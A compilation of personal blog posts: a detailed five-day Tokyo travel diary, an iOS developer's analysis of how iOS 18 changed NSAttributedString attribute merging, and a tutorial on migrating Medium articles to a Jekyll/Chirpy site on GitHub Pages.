Although the Tokyo trip was the planned overseas arrangement, we only talked about it until the Kansai region plans were almost finalized. It was only then that we started planning and executing the Tokyo trip.
For places I haven’t been to, I am still an ENFP spontaneous type, finding everywhere fresh and exciting; so I mainly took care of the general direction of flights, accommodations, and transportation; we decided on attractions based on where other travel companions wanted to go or where we felt like visiting at the moment.
Joy, mainly handled by Sean & James, we planned to buy tickets in advance for Disneyland (Ocean), Yokohama Gundam, and Shibuya Sky; so we bought the tickets two weeks before departure.
If you don’t buy them in advance, there won’t be any available slots on-site.
This time, I brought the Japanese yen left over from the last trip, around ¥60,000, and ended up with around ¥5,000 left.
Because my Visa card couldn't be used at a drugstore in Shinjuku, I had to pay over ¥10,000 in cash for cosmetics, and I decided to spend all the remaining cash.
Also, I almost couldn't get home; when buying a ticket from Tokyo Station to Narita Airport, my card couldn't be used, and I had to scramble to gather enough cash for the fare.
Since this trip was only for 5 days and time was limited, we prioritized early departure and late return flights; we directly checked SkyScanner for flights with suitable timings.
Taipei <-> Narita
EVA Air BR 184: 08:00 TPE -> NRT 12:25
6/22 EVA Air BR 195: 20:40 NRT -> TPE 23:20
$17,086
One mistake here: one person shouldn't buy all three tickets. Each person should buy their own ticket, because purchasing with your own credit card comes with travel insurance.
Later, I found out that flying from Songshan to Haneda wasn’t much more expensive and was more convenient Orz.
Travel insurance: Done
Similarly, purchase a 5-day unlimited data SIM card on KKDAY for about $500.
Same as the previous post, I used the Suica card directly on my iPhone, but my friend with an Android phone had to buy the Welcome Suica limited-time card (ask at Narita Airport, that’s the only option available).
Since this trip was only to Tokyo, I looked for a hotel where we could stay for four days without changing locations. As it was close to the travel date, there were no available rooms at the Tokyo branches of Toyoko Inn or APA; I had to search on Agoda for a hotel near the middle of Tokyo with access to train and subway stations.
Located at Shiodome Station, providing direct access to Odaiba or Shinjuku.
To go to other places, you need to walk to Shimbashi Station (about 10 minutes), and from Shimbashi to Tokyo Station is another 10 minutes (1-2 stops away).
Reasonably convenient, reasonably priced, with good reviews. The room was clean, comfortable, and not too small. Since there were three of us, the room had two beds and a sofa bed (which was as comfortable as a regular bed).
3 people total NT$23,894
This trip was special because our flight was at 8 a.m. and we were all departing from Taipei. We needed to be at the airport around 6 a.m., which meant leaving home around 4-5 a.m.; considering the excitement of going abroad and the difficulty of falling asleep early, we wouldn't have gotten much rest.
Therefore, a few days before the trip, we decided to stay overnight at the airport the night before. I found out that there was a capsule hotel at Taoyuan Airport, so we decided to give it a try!
Location: 5th floor on the south side of Terminal 2, right next to the terminal (about a 5-minute walk).
The rooms available were double rooms, triple rooms, quadruple rooms, and single beds (approximately 16 beds per room).
When we booked, only single beds were available.
1 person NT$1,500
Basically, I unpacked the items I bought in the Kansai region, took out some clothes and essentials, repacked my suitcase, and then set off.
Currently, you can’t check in for the airport express for the next day’s flight, so I had to carry my luggage to Terminal 2.
Sean & Me & James
Upon arriving at Terminal 2, I went straight to the departure hall on the third floor. From there, I found the location to the south side shopping mall observation deck (walk to the right at the end of the hall).
Walk to the end and take the escalator up.
At the top of the escalator, you’ll see the entrance to a Taiwanese-style hotel.
After checking in, you can store your luggage and then go out to eat.
Eating is not allowed in the rooms. Each of us received a tea bag upon check-in, which we could ask the front desk to brew. We sat at the bar counter near the door to drink it. They also provided towels for joining the membership on-site.
Earplugs are available at the entrance for free.
Corridor
The bathroom facilities were new, clean, and comfortable. There were two toilets, five shower rooms, two hairdryers (one Dyson), and shower gel and shampoo provided. Guests need to bring their own towels and toiletries.
Men’s Bathroom
Upon entering, there is a luggage room on the left. The layout of the beds is as follows:
Dormitory Beds
Each bed had its own mirror, desk, lamp, curtain, and trash can. I slept on the top bunk, and the mattress was thick enough that I didn’t disturb the person on the bottom bunk when moving around.
The mattress is not only thick but also long enough, 176 CM, so sleeping is not a problem; the environment is clean, the lighting is warm, and the air conditioning is very comfortable; the only irresistible factor is that snoring from others can still be heard (so free earplugs are provided at the door).
But I’m not afraid of noise, as long as it’s warm and relaxing, I can sleep well; so I slept until dawn, directly brushing my teeth and checking out at nearly 6 o’clock (slept full and satisfied, then went abroad).
Fortunately, we had a reservation the night before, and when other guests wanted to check in on the spot, there were no more available spots.
In the morning, leisurely enjoy the airport view:
I thought it would be crowded at 8 am in the morning, but luckily there were hardly any people.
If I had known, I would have slept in the capsule hotel until 7 o’clock and then come down!
This time, the boarding gate required taking a shuttle bus (what mainland netizens call a "ferry bus").
It was hot and crowded, but I still made it to the boarding gate:
Bye 🇹🇼
Arrival at Narita Airport
Hey 🇯🇵
It takes about 15 minutes to walk from the plane to the immigration hall, and by the time you actually pick up your luggage and go through customs, it’s already around 1 pm.
When transferring to the Narita Express, I made a mistake at the beginning by swiping my Suica card at the entrance; it turned out that all seats on the Narita Express were reserved, so I had to exit, buy a ticket, and then re-enter the station (later I found out that you can apparently buy tickets directly at the platform machine inside the station).
Later, I took the Narita Express departing at 2 o’clock to Tokyo Station.
Enjoying the scenery along the way, when you can see the Tokyo Skytree, it means you’re almost there.
After arriving at Tokyo Station, I transferred to the subway to Shimbashi Station, then found my way to Shiodome.
The hotel is hidden inside an office building, very unique:
At first, I thought I had walked into someone’s office building by mistake, but it turned out to be the hotel.
Drop off luggage, take a rest: Hotel Villa Fontaine Grand Tokyo Shiodome
(The video was filmed later and is a bit chaotic XD)
You must visit this intersection, reminiscent of the challengers in Alice in Borderland.
Queue up to taste the famous Gokumaru House around 5:30 PM, and after about 45 minutes of waiting, there will be seats available.
I ordered the Kobe beef hamburger + Kobe beef steak + rice ice cream combo (¥3,355):
The staff sear it for about one minute, and then you flip it yourself on the hot plate to cook it to your preferred doneness. Gokumaru House
Here, it is important to use two pairs of chopsticks; for hygiene, use the metal ones for cooking and the bamboo ones for eating, alternating between them.
The Kobe beef steak is delicious, juicy, tender, and has no gamey taste 🤩; the hamburger is also good but a bit heavier.
Accidentally bought some items.
Luckily, Sean bought the tickets early; otherwise, we wouldn’t have been able to get in.
It’s dark up there, a bit windy, and you can’t bring bags (lockers are provided).
Apart from a bar in the corner, there are no other facilities or light pollution, making it great for taking photos and enjoying the night view.
You probably need to make a separate reservation for the bar, and it has the same opening hours as the visit.
The tofu skin instant noodles are delicious.
Early the next morning, rushed to the 10 AM Gundam performance, took a train to Sakuragicho Station, then transferred to a cable car + walked to the Gundam Factory.
The weather is super nice!!
[_KKday Japan Yokohama GUNDAM FACTORY YOKOHAMA & Yokohama Marine Tower Set Ticket_](https://www.kkday.com/zh-tw/product/149471-gundam-factory-yokohama-marine-tower-set-ticket-japan?cid=19365&ud1=9da2c51fa4f2){:target=”_blank”}
The Gundam performance lasted from 10 AM until noon, with different storylines for different sessions; however, since I’m not a Gundam fan, I just enjoyed the spectacle.
But I have to say it’s very spectacular, the details, movements, and sounds are very delicate.
There are also peripheral specialty stores inside, selling Gundam models and exclusive products.
Sean’s Gundam Finished Product
Because I’m not a Gundam fan, I just walked around, watched a few performances, and then left.
I headed to Odaiba, the tram from Shiodome to Odaiba is cool, along the way you can see the Fuji TV station and the whole view of Odaiba.
Upon arriving at Odaiba, let’s first see the Statue of Liberty in Odaiba.
It is 1/7 of the Statue of Liberty in New York, symbolizing the friendly relationship between Japan and France.
A little further ahead, looking back, you can see the Fuji TV station that has been destroyed many times by Arale in Dr. Slump.
A little further ahead, you can go to the mall to eat takoyaki and Taiwanese fried chicken?
Takoyaki is average, too many octopus pieces make it greasy; the fried chicken is quite special, although it’s labeled as Taiwanese-style, it’s actually Japanese fried chicken (thin, boneless) coated with Taiwanese flour for frying. It’s different from Taiwanese fried chicken, but I still told the staff it’s delicious, and that I’m Taiwanese 🤣.
I originally planned to buy clothes and shoes at the department store in Odaiba, but when I was close, I saw that the subway could go to Shinjuku; so I suddenly turned and headed to Shinjuku.
Started shopping around.
Went to Le Labo to smell the Tokyo-exclusive scent, Gaiac 10.
It feels light… woody… can’t really smell it. (But I still bought it on Day 4)
In the end, I only bought clothes, pants, and cosmetics at the department store, and as the weather started to turn gloomy and rainy, I returned to the hotel.
Hot dogs are delicious, and the fruit wine is good!
We set off early, and the weather was overcast and rainy in the morning.
[_KKday Japan Tokyo Disney Resort Tickets Tokyo Disney Resort_](https://www.kkday.com/zh-tw/product/19252?cid=19365&ud1=9da2c51fa4f2){:target=”_blank”}
We bought tickets for DisneySea, not Disneyland. The beautiful castle is in Disneyland; to enter DisneySea, you need to take the park’s tram.
After entering the park, we started drawing lots for performances or entry, but didn’t win any. In the end, we purchased front-row seats for the evening fireworks show “ Believe! ~Sea of Dreams~ “ (you can also watch it from the outside, the show is in the harbor public area).
As the rain got heavier, we went to a roadside shop to buy Mickey raincoats:
I personally think the quality and material are quite good, and there are cute Mickey or Minnie patterns (deep red) to choose from, and they are not expensive!!
Luckily, it didn’t rain after noon!! I’m not a rain man!!
Bought raincoats and headed straight to “ Toy Story Crazy Game House “:
There were a lot of people, waited for about 100 minutes to get in:
The game involves teams of 2 people (1 person can play with a computer) operating buttons to shoot and score with projection balloons, high fun factor, low excitement, suitable for couples or families.
There is also Mr. Egghead’s interactive theater performance and a small souvenir shop nearby:
Very cute hugging brother doll!!
Next is “ Soaring: Fantastic Flight “, also a popular amusement facility:
After queuing to enter, before the game starts, there will be scenes introducing the adventurer’s story, paintings hanging on the wall are actually high-resolution screens with animations and speech, very impressive!
The theater, ball-shaped giant screen + 4D experience (seats will rise and move forward + air scents); the content is landscapes from around the world, for example, the great plains will have the scent of grass; very stunning, suitable for everyone!
Here we bought the fast pass.
After playing these two facilities, it was close to noon, so we started looking for food. Since the restaurants were full, we could only find snacks like pizza, chicken legs… etc.
Just as we came out with food, the Harbor Show “ Colors of Christmas “ started:
After eating, we started wandering around the souvenir shops in the park:
After digesting, we started queuing for “ Journey to the Center of the Earth “:
It takes about 90-100 minutes, just enough time to fully digest, otherwise it would be too exciting XD
The content is a replica of the movie “Journey to the Center of the Earth”, with impressive scenes and immersion; at the end, there will be acceleration and a slight descent (feeling of weightlessness), the excitement is stronger but not to the point of feeling weak in the legs, suitable for friends looking for a bit of excitement.
After coming out, we went to the nearby “ 20,000 Leagues Under the Sea “ to relax:
Not many people, the content is a simulated feeling of diving in a submarine (but it should be simulated), very low excitement, only suitable for young children.
After sitting down, we continued to wander around and eat:
Very cute but very sweet Mickey ice cream bars, and Anna Belle (Lena Belle).
Continued to walk around and take pictures, the park is really big, just took some scenery shots, didn’t take any pictures of animated fantasy scenes:
After reaching the end, we went to ride “ Indiana Jones Adventure: Temple of the Crystal Skull “:
No deep-sea exploration adventure (no weightlessness and not that fast down), the content is an immersive scene from the movie Indiana Jones, personally I find it interesting and fun.
Continuing to skim through:
Also took the “ Disney Sea Ferry Route “ and “ Disney Sea Electric Railway “ because my feet were sore from walking, and the scenery along the way was nice; more inclined towards the transportation facilities within the park, without any special amusement effects.
As the evening approached, started shopping and taking photos:
Had to admit it was easy to go on a shopping spree because of many 40th-anniversary limited editions; also took photos with the Earth.
Approaching the start time of the performance, started walking back to the harbor and sat on the ground upon entry.
As mentioned earlier, we also purchased regular seats for viewing.
The whole performance experience was very immersive, including music, projections (the volcano will erupt at the back!), lasers, fireworks, Disney Sea-related character plots… all combined very well, definitely worth staying until the end of the evening to watch the performance.
After experiencing the whole day at Disney, my impression is that all the facilities are very immersive, not just simple amusement facilities, but aiming for visitors to immerse themselves in that character and scene; although not as thrilling as Universal, I find it very entertaining; the fireworks show at night is a must-see!
There are many cute souvenirs, need to control your hands (stop shopping)!
Ate random food, think it’s better to bring your own food from outside.
If time allows, it’s better to spend two days on land and sea, the sea part lacks the dreamy castle and the parade on land QQ
Outside JR Maihama Station, there is still a last peripheral specialty store to shop at, took one last stroll before leaving reluctantly.
After returning to the hotel, continued with the daily routine; today had soy sauce ramen, cantaloupe fruit juice (delicious!!), Akaya plum wine (delicious!!), and oolong shochu (tasteless, not good).
After a good night’s sleep, started thinking about today’s itinerary (crazy ENFP), the only thing everyone did together was Tokyo Skytree at night; in the morning, friends went to Akihabara, it was a day to explore Tokyo alone.
Looking at the map, Shinbashi is not far from Tokyo Tower; decided to go there first.
Upon leaving, found out that there was a serious subway accident causing delays, so decided to walk instead (about 20 minutes):
Walking alone on the streets of Tokyo, it’s not too hot in June, enjoying the breeze.
Encountered a vendor selling hot roasted sweet potatoes on the roadside.
When approaching Tokyo Tower, passed by a park called “Tokyo Metropolitan Shiba Park” and viewing the tower through the branches from here offers a unique perspective:
Continuing down the mountain road, arrived at the base of Tokyo Tower.
[_KKday Japan Tokyo Tokyo Tower Main Observatory Tokyo Tower E-Ticket_](https://www.kkday.com/zh-tw/product/12271-japan-tokyo-tower-observatory-e-ticket?cid=19365&ud1=9da2c51fa4f2){:target=”_blank”}
Upon entering the tower, purchased Top Deck tickets; besides being able to go up to the top of the tower, the ticket includes a guided tour (with Chinese audio) and a complimentary souvenir photo of the visit! (Great experience)
The guided tour features interactive murals similar to those at Disneyland yesterday 😆, with two forerunners in conversation discussing the construction of this iconic Japanese building; the same architect's other famous work is the Tsutenkaku in Osaka.
The morning view of Tokyo from above is nice, with the third image showing the Skytree to visit at night.
Finally, a free commemorative photo of the successful tower climb!
After visiting Tokyo Tower, checked the map and decided to head to Meiji Shrine.
After getting off the subway, walked a long way (about 30 minutes) to reach Meiji Shrine.
A special encounter was witnessing a traditional Japanese wedding ceremony happening at the shrine:
Finished the visit at the main hall and left.
Found Meiji Shrine to be more solemn and serious, while Asakusa Temple felt crowded with tourists.
The next stop was Kameari, home of the Kameari Park made iconic by KochiKame, which I wanted to see for myself; on the way there, I stopped by Le Labo in Omotesando for another sniff.
Honestly, I’m not that interested in Le Labo; I prefer Ormonde Jayne perfumes personally, and Le Labo gives me a mass-market packaging vibe.
After a sniff, bought Another 13, a strong scent; and inevitably, also bought the Tokyo-exclusive Gaiac 10, both in 15ml as souvenirs.
Le Labo perfumes are packaged and labeled on-site (takes about 15–20 minutes), allowing customization of your own label; I chose “ZhgChgLi” for 13, my personal favorite, and 10 represents Tokyo, asking the staff in broken English which one represents Japan, and he said ♨️ 😝.
The prices for Le Labo in Japan are as shown, with an additional discount for tax exemption on 13.
The Tokyo-exclusive Gaiac 10 is more expensive, costing ¥16,800 after tax exemption.
After shopping, continue to walk towards Kameari (Kameari is really far).
As soon as you exit the station, there are statues of KochiKame characters:
Checked the map and went to Kameari Park near the back station for a stroll:
It’s just an ordinary park, with many children playing soccer inside. There is a statue in a sitting position, covered with children’s belongings, so I didn’t take any photos.
Checked online and found that there is a KochiKame police-box set at the nearby Ario department store, so I continued walking (about 10 minutes):
Upon entering, I was disappointed. It's clear that KochiKame's popularity has declined (young people don't watch it anymore…). Apart from the statues at the station exit, from the ordinary park to the so-called police-box attraction, only the set remains, and the area around it has been turned into a playground (with claw machines).
The saddest part was the gachapon machine at the entrance, with the character's eyes broken and unrepaired, giving a desolate feeling. In the end, I got a detective in hot pants from the machine and left feeling disappointed.
Checked the map and took a bus to Asakusa, which is closer. It took about 15 minutes to check the route and walk to the bus stop:
There were hardly any people or tourists on the way to the bus stop, and even Google Translate couldn’t translate the bus route; I had truly arrived in a non-touristy area.
I made a mistake when boarding the bus because in Kyoto, you pay when you get off, so I stood there blankly after boarding the bus, not understanding Japanese. It wasn’t until a kind Japanese passenger said “pay pay” that I realized I had to swipe my card to pay at the front.
The journey was quiet and comfortable, with Japanese drivers waiting for passengers to sit down and get up before starting the bus. We swayed all the way to Senso-ji Temple in Asakusa.
KKday Tokyo Kimono Rental Recommendation! Tokyo Asakusa Kimono Experience
There were so many tourists!! It was so crowded that I could only find angles to take photos.
Continued walking towards Senso-ji Temple, there were just too many tourists. I didn’t plan to buy anything, just wanted to take a look around. Along the way, I found this bean shop unexpectedly delicious, so I bought some as souvenirs.
After visiting Senso-ji Temple, there were still many people, so we took some photos and left.
As it was getting close to evening, we started moving towards the Tokyo Skytree.
Senso-ji Temple overlooking the Tokyo Skytree.
Since it was still early, we continued to enjoy the scenery along the way.
Getting closer, it kept getting bigger.
After arriving at the Tokyo Skytree, we first strolled around the shopping mall inside, ordered a cup of Hokkaido strawberry ice cream to take a break.
We didn’t buy tickets for the Top Deck at the Tokyo Skytree, only for the middle observation deck, entering at 7 p.m.
When we first went up, it wasn’t dark yet, so we took a few casual photos:
After sunset, we could overlook the entire night view of Tokyo, which was very beautiful.
In the top left corner of the first picture is the distant Tokyo Tower; it was quite dark inside, and the glass reflected light making it difficult to take selfies.
Managed to take one picture XD
Before leaving, we took one last look back.
On the last night, we ate at an izakaya and took some photos of the night views along the way:
Charcoal-grilled Chicken
Japan’s weather turned bad today. It was unexpected to see the Tokyo Tower every day passing by Shiodome, along with special art installations. We finally stopped to appreciate it on the last day.
Still, Nissin noodles are delicious, especially with convenience store fried chicken 🤤! Bought melon juice a few days ago, and today bought strawberry juice, both were delicious; can’t remember the sake, so they were probably average.
After waking up and storing our luggage, like Day 4, I casually explored Tokyo because my flight was in the evening, so I had most of the day to wander around, but the weather was gloomy and rainy.
Remembering seeing a gachapon machine at the Tokyo Skytree yesterday with Japanese representative landmarks, I hadn’t seen the National Diet Building, so I headed in that direction.
One interesting thing was encountering a protest by Japanese extremists on the way.
Someone was driving a propaganda truck near the Diet Building, broadcasting loudly; the police stopped him and removed his loudspeaker. He later accelerated through a red light to escape, with police everywhere; it was a bit scary.
Passed by the Diet Building and saw that the main gate was closed, so I didn't go in (it seems you can enter from the side gate for a visit?):
Took a distant photo as a souvenir and then continued walking towards the Imperial Palace.
The Imperial Palace is really big; it took about 30 minutes just to walk from the outer entrance.
After reaching the Tenshukaku, left as the Imperial Palace was not open for visitors that day.
Took about another hour to walk back to Tokyo Station (could have taken the subway, but it’s only one or two stops; I like to walk around the streets and see the scenery).
Around noon, wandered around Tokyo Station; just to prove that I wouldn’t get lost, but too lazy to line up at the famous souvenir shops.
Had tempura soba noodles for the last meal.
Bought a large and a small bottle of sake from a liquor store to take back to Taiwan; the store clerk was also Taiwanese.
Around 4 PM, went back to the hotel to pick up luggage and slowly made my way to Narita Airport.
A glimpse of Shinbashi before leaving.
Returned directly to Narita Airport from Shinbashi because of the schedule and the ample time; took the Toei Asakusa Line Airport Express, which takes about 1 hour and 15 minutes. I couldn't use a credit card or Suica to buy the tickets, so we pooled cash for three tickets on the spot and barely had enough.
Arrived at the airport around 5:30, still early.
After going through immigration, still had plenty of time, so grabbed a bite to eat and did some last-minute shopping at the duty-free shop.
Found everything from Tanjirō to common souvenirs (Shiroi Koibito, banana cake, etc.) here, so just bought them here XD
The price of Tanjirō here is about the same as what I bought at Tokyo Station.
Boarded the plane, Hey 🇹🇼:
The weather in Japan was very bad and the flight was bumpy (fish-eye shot), more thrilling than Disney's rides; meal service even had to be suspended at one point. Luckily, we arrived back in Taiwan safely.
The customs clearance took about 12 minutes, and taking a taxi back to Taipei took about 1:30; taking a shower and going straight to bed, ending this journey.
The brainwashing song that kept playing after returning to Taiwan.
For any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Starting from iOS ≥ 18, merging NSAttributedString attributes Range will reference Equatable
Photo by C M
After the launch of iOS 18 on September 17, 2024, a developer reported a crash when parsing HTML in the open-source project ZMarkupParser.
This issue was puzzling at first, because the code had worked fine before and the crash only occurred on iOS 18; that pointed to some adjustment in iOS 18's underlying Foundation.
After tracing the code, the crash was pinpointed to the place where the code iterates over the .breaklinePlaceholder attributes and deletes ranges:
mutableAttributedString.enumerateAttribute(.breaklinePlaceholder, in: NSMakeRange(0, mutableAttributedString.string.utf16.count)) { value, range, _ in
    // ...if condition...
    // mutableAttributedString.deleteCharacters(in: preRange)
    // ...if condition...
    // mutableAttributedString.deleteCharacters(in: range)
}
.breaklinePlaceholder is a custom NSAttributedString.Key I added to mark HTML tag information, in order to optimize the handling of line-break symbols:
struct BreaklinePlaceholder: OptionSet {
    let rawValue: Int

    static let tagBoundaryPrefix = BreaklinePlaceholder(rawValue: 1)
    static let tagBoundarySuffix = BreaklinePlaceholder(rawValue: 2)
    static let breaklineTag = BreaklinePlaceholder(rawValue: 3)
}

extension NSAttributedString.Key {
    static let breaklinePlaceholder: NSAttributedString.Key = .init("breaklinePlaceholder")
}
But the core issue is not there: on iOS ≤ 17 the same operations on the input mutableAttributedString caused no problem, which indicates that the content of the input data has changed on iOS 18.
Before digging into the problem, let's first look at the merging mechanism of NSAttributedString attributes.
NSAttributedString automatically compares the attribute objects of adjacent ranges that share the same key; if they are considered equal, the ranges are merged into a single attribute run. For example:
let mutableAttributedString = NSMutableAttributedString(string: "", attributes: nil)
mutableAttributedString.append(NSAttributedString(string: "<div>", attributes: [.font: UIFont.systemFont(ofSize: 14)]))
mutableAttributedString.append(NSAttributedString(string: "<div>", attributes: [.font: UIFont.systemFont(ofSize: 14)]))
mutableAttributedString.append(NSAttributedString(string: "<p>", attributes: [.font: UIFont.systemFont(ofSize: 14)]))
mutableAttributedString.append(NSAttributedString(string: "Test", attributes: [.font: UIFont.systemFont(ofSize: 12)]))
Final Merged Attributes:
<div><div><p>{
    NSFont = "<UICTFont: 0x101d13400> font-family: \".SFUI-Regular\"; font-weight: normal; font-style: normal; font-size: 14.00pt";
}Test{
    NSFont = "<UICTFont: 0x101d13860> font-family: \".SFUI-Regular\"; font-weight: normal; font-style: normal; font-size: 12.00pt";
}
When enumerating with enumerateAttribute(.font, ...), the following results are obtained:
NSRange {0, 13}: <UICTFont: 0x101d13400> font-family: ".SFUI-Regular"; font-weight: normal; font-style: normal; font-size: 14.00pt
NSRange {13, 4}: <UICTFont: 0x101d13860> font-family: ".SFUI-Regular"; font-weight: normal; font-style: normal; font-size: 12.00pt
It is speculated that the underlying implementation uses a Set<Hashable> as the attributes container, automatically de-duplicating equal attribute objects.
However, for ease of use, the values of NSAttributedString's attributes: [NSAttributedString.Key: Any] dictionary are declared as Any, without a Hashable constraint.
Therefore, it is speculated that the system casts the values to Hashable (as? Hashable) under the hood and then uses a Set to merge and manage the objects.
The behavioral change in iOS ≥ 18 is speculated to come from an adjustment in this underlying implementation.
The following is an example using our custom .breaklinePlaceholder attribute:
struct BreaklinePlaceholder: Equatable {
    let rawValue: Int

    static let tagBoundaryPrefix = BreaklinePlaceholder(rawValue: 1)
    static let tagBoundarySuffix = BreaklinePlaceholder(rawValue: 2)
    static let breaklineTag = BreaklinePlaceholder(rawValue: 3)
}

extension NSAttributedString.Key {
    static let breaklinePlaceholder: NSAttributedString.Key = .init("breaklinePlaceholder")
}

// Build the test string:

let mutableAttributedString = NSMutableAttributedString(string: "", attributes: nil)
mutableAttributedString.append(NSAttributedString(string: "<div>", attributes: [.breaklinePlaceholder: BreaklinePlaceholder.tagBoundaryPrefix]))
mutableAttributedString.append(NSAttributedString(string: "<div>", attributes: [.breaklinePlaceholder: BreaklinePlaceholder.tagBoundaryPrefix]))
mutableAttributedString.append(NSAttributedString(string: "<p>", attributes: [.breaklinePlaceholder: BreaklinePlaceholder.tagBoundaryPrefix]))
mutableAttributedString.append(NSAttributedString(string: "Test", attributes: nil))
<div>{
    breaklinePlaceholder = "NSAttributedStringCrash.BreaklinePlaceholder(rawValue: 1)";
}<div>{
    breaklinePlaceholder = "NSAttributedStringCrash.BreaklinePlaceholder(rawValue: 1)";
}<p>{
    breaklinePlaceholder = "NSAttributedStringCrash.BreaklinePlaceholder(rawValue: 1)";
}Test{
}
<div><div><p>{
    breaklinePlaceholder = "NSAttributedStringCrash.BreaklinePlaceholder(rawValue: 1)";
}Test{
}
The same code produces different results on different iOS versions, and the subsequent handling logic in enumerateAttribute(.breaklinePlaceholder...) is what ultimately led to the unexpected crash.
Comparison of results with and without implementing Equatable/Hashable on iOS 17/18
⭐️⭐️ iOS ≥ 18 references Equatable when merging, while iOS ≤ 17 does not. ⭐️⭐️
Putting it all together: the values of NSAttributedString's attributes: [NSAttributedString.Key: Any] are declared as Any; based on my observations, iOS ≥ 18 first references Equatable to determine equality and then uses a Hashable-based Set to merge and manage the objects.
In other words, when merging adjacent attribute ranges, iOS ≥ 18 consults Equatable, which it did not do before.
Additionally, starting from iOS 18, if the attribute value type only declares Equatable, the Xcode Console will also output a warning:
Obj-C ` -hash` invoked on a Swift value of type `BreaklinePlaceholder` that is Equatable but not Hashable; this can lead to severe performance problems.
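The article doesn't prescribe a fix, but a minimal sketch of one option (my own suggestion based on the warning above, not something stated in the source) is to make the custom attribute value conform to Hashable as well, which silences the warning and gives the system a full equality/hashing implementation to work with:

// Sketch: conform the custom attribute value type to Hashable in addition to Equatable.
// For a struct whose only stored property is an Int, Swift synthesizes the conformance automatically.
struct BreaklinePlaceholder: OptionSet, Hashable {
    let rawValue: Int

    static let tagBoundaryPrefix = BreaklinePlaceholder(rawValue: 1)
    static let tagBoundarySuffix = BreaklinePlaceholder(rawValue: 2)
    static let breaklineTag = BreaklinePlaceholder(rawValue: 3)
}

Whether adjacent runs should merge or stay separate is a separate design decision; the point is simply to keep equality and hashing consistent so the enumeration logic does not behave differently across OS versions.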
For any questions or suggestions, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Migrating Medium content to Github Pages (with Jekyll/Chirpy)
In the fourth year of running Medium, I have accumulated over 65 articles, nearly 1000+ hours of effort; the reason I chose Medium initially was its simplicity and convenience, allowing me to focus on writing without worrying about other things. Before that, I had tried self-hosting Wordpress, but I spent all my time on setting up the environment, styles, and plugins, never feeling satisfied with the adjustments. After setting it up, I found it loaded too slowly, the reading experience was poor, and the backend writing interface was not user-friendly, so I stopped updating it.
As I wrote more articles on Medium and accumulated some traffic and followers, I started wanting to control these achievements myself, rather than being controlled by a third-party platform (e.g. Medium shutting down and losing all my work). So, I began looking for a second backup website two years ago. I continued to run Medium but also synchronized the content to a website I could control. The solution I found at the time was Google Sites, but honestly, it could only be used as a personal "portal site": the article writing interface was limited in functionality, and I couldn't really transfer all my work there.
In the end, I returned to self-hosting, but this time using a static website instead of a dynamic one (e.g. Wordpress). Static websites support fewer features, but all I needed was a writing function and a clean, smooth, customizable browsing experience, nothing else!
The workflow for a static website is: write the article locally in Markdown format, then convert it to a static webpage using a static site engine and upload it to the server, and it’s done. Static webpages provide a fast browsing experience!
Writing in Markdown format allows the article to be compatible with more platforms. If you’re not used to it, you can find online or offline Markdown writing tools, and the experience is just like writing directly on Medium!
In summary, this solution meets my needs for a smooth browsing experience and a convenient writing interface.
Here, I will use my environment as an example. For other operating system versions, please Google how to install Ruby.
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
Enter the above command in Terminal to install Brew.
brew install rbenv ruby-build
Although MacOS comes with Ruby, it is recommended to use rbenv to install another Ruby to separate it from the system’s built-in version. Enter the above command in Terminal to install rbenv.
rbenv init
Enter the above command in Terminal to initialize rbenv.
Enter rbenv in Terminal to check whether the installation succeeded!
Success!
rbenv install 2.6.5
Enter the above command in Terminal to install Ruby version 2.6.5.
rbenv global 2.6.5
Enter the above command in Terminal to switch the Ruby version used by Terminal from the system’s built-in version to the rbenv version.
Enter rbenv versions in Terminal to check the current settings:
Enter ruby -v in Terminal to check the current Ruby version, and gem -v to check the current RubyGems status:
*RubyGems is installed together with Ruby.
Success!
gem install jekyll bundler ZMediumToMarkdown
Enter the above command in Terminal to install Jekyll & Bundler & ZMediumToMarkdown.
Done!
The default Jekyll Blog style is very simple. We can find and apply our favorite styles from the following websites:
The installation method generally uses gem-based themes, some repos provide a Fork method for installation, and some even offer a one-click installation method. In short, the installation method may vary for each template, so please refer to the template’s tutorial for usage.
Additionally, note that since we are deploying to Github Pages, according to the official documentation, not all templates are applicable.
Here, I will use the template Chirpy as an example, which I adopted for my Blog. This template provides the simplest one-click installation method and can be used directly.
Other templates rarely offer similar one-click installation. If you are not familiar with Jekyll or GitHub Pages, using this template is a better way to get started. I will update the article with other template installation methods in the future.
Additionally, you can find templates on GitHub that can be directly forked (e.g., al-folio) and used directly. If not, you will need to manually install the template and research how to set up GitHub Pages deployment. I tried this briefly but was not successful. I will update the article with my findings in the future.
Go to https://github.com/cotes2020/chirpy-starter/generate and name the new repository GithubUsername.github.io or OrganizationName.github.io (make sure to use this format), then click "Create repository from template" to complete the Repo creation.
git clone git@github.com:zhgchgli0718/zhgchgli0718.github.io.git
Git clone the newly created Repo.
Run bundle to install the dependencies:
Run bundle lock --add-platform x86_64-linux to add the Linux platform to the lockfile (needed for the GitHub Pages build):
Open the _config.yml configuration file and set it up:
# The Site Configuration

# Import the theme
theme: jekyll-theme-chirpy

# Change the following value to '/PROJECT_NAME' ONLY IF your site type is GitHub Pages Project sites
# and doesn't have a custom domain.
# baseurl: ''

# The language of the webpage → http://www.lingoes.net/en/translator/langcode.htm
# If it has the same name as one of the files in folder `_data/locales`, the layout language will also be changed,
# otherwise, the layout language will use the default value of 'en'.
lang: en

# Additional parameters for datetime localization, optional. → https://github.com/iamkun/dayjs/tree/dev/src/locale
prefer_datetime_locale:

# Change to your timezone → http://www.timezoneconverter.com/cgi-bin/findzone/findzone
timezone:

# jekyll-seo-tag settings → https://github.com/jekyll/jekyll-seo-tag/blob/master/docs/usage.md
# ↓ --------------------------

title: ZhgChgLi # the main title

tagline: Live a life you will remember. # it will display as the sub-title

description: >- # used by seo meta and the atom feed
  ZhgChgLi iOS Developer eager to learn, teaching and learning from each other, loves movies/TV shows/music/sports/life

# fill in the protocol & hostname for your site, e.g., 'https://username.github.io'
url: 'https://zhgchg.li'

github:
  username: ZhgChgLi # change to your github username

twitter:
  username: zhgchgli # change to your twitter username

social:
  # Change to your full name.
  # It will be displayed as the default author of the posts and the copyright owner in the Footer
  name: ZhgChgLi
  email: zhgchgli@gmail.com # change to your email address
  links:
    - https://medium.com/@zhgchgli
    - https://github.com/ZhgChgLi
    - https://www.linkedin.com/in/zhgchgli

google_site_verification: # fill in to your verification string

# ↑ --------------------------
